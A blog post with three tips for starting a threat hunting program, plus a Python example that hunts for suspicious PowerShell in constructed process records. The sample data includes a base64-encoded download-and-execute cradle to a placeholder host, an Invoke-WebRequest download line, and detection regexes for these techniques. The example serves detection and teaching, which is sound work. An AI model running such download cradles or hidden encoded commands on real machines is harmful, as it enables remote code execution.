3 Tips for Starting a Threat Hunting Program
So, you want to build a threat hunting program…but where do you start?
There are lots of ways to build a threat hunting program for your own org and depending on your hunting goals, there are plenty of options for how to hunt and what tools to use.
However, it can be challenging to figure out exactly what approach is going to achieve the outcomes you want when there are fancy new tools and security buzzwords flying at you left and right – which is why we’re here to help you filter out the shiny stuff and focus on your strategy and goals.
What is threat hunting?
Threat hunting is the process of creating a hypothesis, gathering historical data, applying filtering criteria that supports the hypothesis, and investigating the leads that are generated.
Threat hunting is important because attackers are getting craftier with their tactics, and the resulting attacks are becoming more advanced and harder to detect. Security teams need additional methods to find threats that sometimes don’t get picked up by traditional defense measures.
You can use your existing security tools for threat hunting, or consider what tools will help you meet the goals of a new threat hunting program within your own org. And don’t forget that combining tools you already have with other information – like open-source intelligence – is an option, too.
Is hunting right for your org?
Threat hunting provides your org with an extra layer of security, but it’s also resource intensive. Before building your own threat hunting program consider your risks and resources.
For example, if you operate in a high-risk (and highly targeted) environment – such as a financial institution, healthcare facility or company that stores large amounts of personal and financial info – then hunting probably makes sense to defend against all of the adversaries who are targeting your network. However, if your org’s risk profile is medium- to low-risk, you’re likely the target of commodity malware and should evaluate where your resources are most needed. Hunting can distract security teams from tasks that should probably be higher on the priority list, such as effective anti-phishing controls, asset management and third-party assessments.
3 tips for building your own threat hunting program
Before asking your CISO for more resources, there are a couple of important considerations you need to review. Think through your objectives, how you’ll report on what you find and how you’ll eventually scale your hunting program.
Here are our three must-dos before you start your own threat hunting program:
- Know your threat hunting objectives.
  - Validation: Your objective is to validate existing security controls. This means your hunting hypothesis is focused on an attacker bypassing one or more security controls.
  - Quality: You’re using hunting to perform QA on your alert management and triage. You probably want to have someone reviewing the hunt results who did not spend a ton of time in the past month reviewing alerts. You’ll want to run techniques where the hypothesis is looking for activity where you would have expected alerts to be generated. A good example here is suspicious PowerShell usage.
  - Identify: Find threats or notable events in your environment. If you are hunting, the goal doesn’t always have to be to identify threats. Notable events are events hunting identified that were previously unknown. They may be policy violations like discovering unauthorized software, or they could be activities that software or employees performed that the org didn’t know about.
  - Evolve: Evolve your hunting and detection libraries. If you have hunting techniques in place, a long-term goal is to figure out ways to make them high enough fidelity, without losing their value, that they can become detections. Similarly, if you have detections that are too false-positive prone, think about how you can build a hypothesis around them and turn them into hunting techniques.
- Decide how and what you’ll report on, and who you’re going to tell.
  After defining your objectives, think about how you’ll report on the findings from a hunt, and who you’re going to brief on that info. For example, what attacker technique are you hunting for, and why? What data did you review, and what did you discover? Then talk about the outcome of your hunt, including what steps you should take — if any — to make your org more resilient going forward.
- Consider how you’ll scale the program.
  Conducting a first successful hunt is great, but how will you make threat hunting part of your ongoing security practices going forward? Can you maintain an effective threat hunting program with the resources you have today, or do you need new tools or more people? Think about what scale looks like, and be prepared to have a conversation about it with your CISO or team lead.
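As an added example (not part of the original post, and not Expel’s or Carbon Black’s tooling), here is a small Python hunt that walks through the process described above: a hypothesis, historical process-creation data, filtering criteria that support the hypothesis, and the leads that fall out. It uses the "suspicious PowerShell usage" hypothesis from the Quality objective, compares the leads against the alerts that actually fired (the QA angle), and scores each criterion’s precision against analyst verdicts to decide which ones are clean enough to promote to a detection (the Evolve objective). All records, alert ids, verdicts and the `example.invalid` URL are constructed; the PowerShell indicators are generic, widely documented ones.

```python
"""Hypothesis-driven hunt over constructed process-creation records.

Hypothesis: PowerShell is being launched in ways that should already have
raised an alert (encoded commands, hidden windows, download cradles).
Leads are compared with alerts that fired, and each criterion is scored
for precision to judge whether it should graduate into a detection.
"""
import base64
import re

# Constructed sample data, not real telemetry: a benign-looking encoded payload
# of the kind a hunt must decode before it can inspect it.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")
).decode()

RECORDS = [
    {"id": 1, "host": "ws01", "user": "alice",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"id": 2, "host": "ws02", "user": "bob",
     "cmd": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"id": 3, "host": "srv01", "user": "svc_backup",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File D:\\backup\\rotate.ps1"},
    {"id": 4, "host": "ws03", "user": "carol",
     "cmd": 'powershell.exe -c "Invoke-WebRequest http://example.invalid/x.zip -OutFile x.zip"'},
    {"id": 5, "host": "ws04", "user": "dave", "cmd": "cmd.exe /c dir"},
]

ALERTS_FIRED = {2}                                   # constructed: ids the alert pipeline caught
ANALYST_VERDICTS = {2: True, 3: False, 4: False}     # constructed: True = confirmed malicious

ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression",
    re.I,
)
EXECPOLICY_BYPASS = re.compile(r"-(executionpolicy|ep)\s+bypass", re.I)


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    tokens = cmd.split()
    for flag, value in zip(tokens, tokens[1:]):
        if ENCODED_FLAG.match(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt_criteria(record):
    """Filtering criteria supporting the hypothesis; returns why a record is a lead."""
    cmd = record["cmd"]
    if "powershell" not in cmd.lower():
        return []
    reasons = []
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden_window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_command")
    # Inspect the decoded payload when present so encoding cannot hide the cradle.
    if DOWNLOAD_CRADLE.search(decoded if decoded is not None else cmd):
        reasons.append("download_cradle")
    if EXECPOLICY_BYPASS.search(cmd):
        reasons.append("execpolicy_bypass")
    return reasons


def run_hunt(records):
    """Apply the criteria to historical data and return the leads to investigate."""
    return [{**r, "reasons": hunt_criteria(r), "decoded": decode_encoded_command(r["cmd"])}
            for r in records if hunt_criteria(r)]


def alert_gaps(leads, alerts_fired):
    """Quality objective: leads where an alert was expected but none fired."""
    return [lead["id"] for lead in leads if lead["id"] not in alerts_fired]


def criterion_fidelity(leads, verdicts):
    """Evolve objective: precision of each criterion against analyst verdicts.
    Near 1.0 is a candidate detection; near 0.0 stays a hunt or is dropped."""
    counts = {}
    for lead in leads:
        malicious = verdicts.get(lead["id"], False)
        for reason in lead["reasons"]:
            hits, total = counts.get(reason, (0, 0))
            counts[reason] = (hits + int(malicious), total + 1)
    return {reason: hits / total for reason, (hits, total) in counts.items()}


if __name__ == "__main__":
    leads = run_hunt(RECORDS)
    for lead in leads:
        print(f"lead {lead['id']} {lead['host']}/{lead['user']}: {', '.join(lead['reasons'])}")
    print("leads with no corresponding alert:", alert_gaps(leads, ALERTS_FIRED))
    for reason, precision in sorted(criterion_fidelity(leads, ANALYST_VERDICTS).items()):
        print(f"{reason}: precision {precision:.2f}")
```

Run as-is, the hunt flags records 2, 3 and 4; only record 2 had alerted, so records 3 and 4 are the QA findings to hand to whoever owns the alert pipeline. The `-ExecutionPolicy Bypass` criterion scores 0.0 precision on this sample because admins use it legitimately, which is exactly the kind of technique that stays a hunt rather than becoming a detection, while the encoded-command criterion scores 1.0 and is a promotion candidate once it has held up over more data.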
Ready to get started? Here are a couple more good tips and how-tos for threat hunting.
The post Partner Perspectives: 3 Tips for Starting a Threat Hunting Program appeared first on Carbon Black. Peter Silberman is the Director of Detection & Response, Innovation at Expel. Mary Singh is a Detection and Response Lead at Expel.